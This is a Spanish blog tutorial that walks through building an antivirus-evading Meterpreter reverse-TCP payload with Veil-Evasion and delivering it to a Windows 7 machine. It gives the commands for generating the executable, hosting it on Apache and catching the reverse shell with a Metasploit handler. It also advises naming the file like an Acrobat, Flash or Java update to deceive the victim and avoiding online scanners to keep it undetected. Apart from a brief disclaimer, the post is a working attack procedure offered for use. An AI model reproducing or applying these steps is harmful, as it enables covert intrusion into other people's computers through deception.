viernes, 5 de febrero de 2016

Intrusión a Windows 7 evadiendo firewall de Windows y Antivirus

ADVERTENCIAS: 
  • La información siguiente puede ser utilizada para fines delictivos. No me hago responsable del uso de la misma. 
  • La práctica ha sido realizada en un entorno controlado.

Hola a todos:

Hoy, en lugar de seguir con XSS, se me ha ocurrido hacer una pequeña intrusión a un equipo local con Windows 7 Professional, de 32 bits, con Avast Antivirus y Firewall de Windows activado.


Para ello, abrimos la consola en Kali Linux y ejecutamos

veil-evasion

y actualizamos con update




con list, visualizamos los payloads posibles, usaremos el 31, python/meterpreter/reverse_tcp


Como es un Windows a 32 bits, dejamos la arquitectura a 32 bits.
Dejamos Y para que compile de Python a un archivo ejecutable.
Dejamos X en la parte de EXPIRE_PAYLOAD para que no caduque. En caso contrario, pondríamos el número de días que queremos que el PAYLOAD se siga ejecutando.
En LHOST, pondremos la dirección IP interna de la máquina atacante, en nuestro caso será 192.168.1.131.
Dejamos el puerto tal y como está, si queremos, lo podemos cambiar a otros puertos.
No usaremos PYHERION para encriptar, pero podríamos usarlo perfectamente.

Modificamos la IP interna como decíamos antes con

set LHOST 192.168.1.131

En su lugar, podemos poner también una dirección DNS.

­
generate

así generaremos el PAYLOAD.

Nos pedirá el nombre para el PAYLOAD, yo lo llamaré manugomez1977.

Crearemos el PAYLOAD con la primera opción, Pyinstaller.




El ejecutable nos lo ha guardado en la carpeta /var/lib/veil-evasion/output/compiled/manugomez1977.exe

Su código fuente, en python, en /var/lib/veil-evasion/output/source/manugomez1977.py

Y el Handler para Metasploit en /var/lib/veil-evasion/output/handlers/manugomez1977_handler.rc.

El archivo Handler es un script para Metasploit que ejecuta todos los comandos que tendríamos que poner a mano, así nos ahorramos tiempo.

IMPORTANTE: No subáis el archivo a ningún antivirus online.

El siguiente paso es pasar el ejecutable manugomez1977.exe al equipo víctima. ¿Cómo?, nos buscaremos la vida.

Por ejemplo, yo voy a montar un servidor web con apache y le pasaré el enlace.

service apache2 start

cp /var/lib/veil-evasion/output/compiled/manugomez1977.exe 7 /var/www/

Ahora, es cuestión de enviar el enlace a la víctima. Podríamos redireccionarla envenenando la tabla
ARP del router, pero, en este caso, vamos a hacerlo a través de enlace.

En la barra de direcciones, la víctima pondrá:




Aunque hemos puesto como nombre de archivo manugomez1977, podríamos haber puesto el nombre de una actualización de Acrobat reader, Flash, Java, etc. para engañarla y asegurarnos de que la abra.

Es el momento de abrir Metasploit, para ello pondremos la dirección del handler:

msfconsole -r /var/lib/veil-evasion/output/handlers/manugomez1977_handler.rc



La victima, ejecutará el archivo:


El antivirus analiza el archivo:



Sin embargo, a nosostros, nos ha abierto una conexión procedente de la máquina víctima:


con sessions -i, podemos ver las conexiones activas.



Con sessions -i 2 interactuamos con la sesión de meterpreter....y..... a jugar !!!!!!!!!!!!!!!!!!!!


Happy Hacking ;-)

No hay comentarios:

Publicar un comentario

Nota: solo los miembros de este blog pueden publicar comentarios.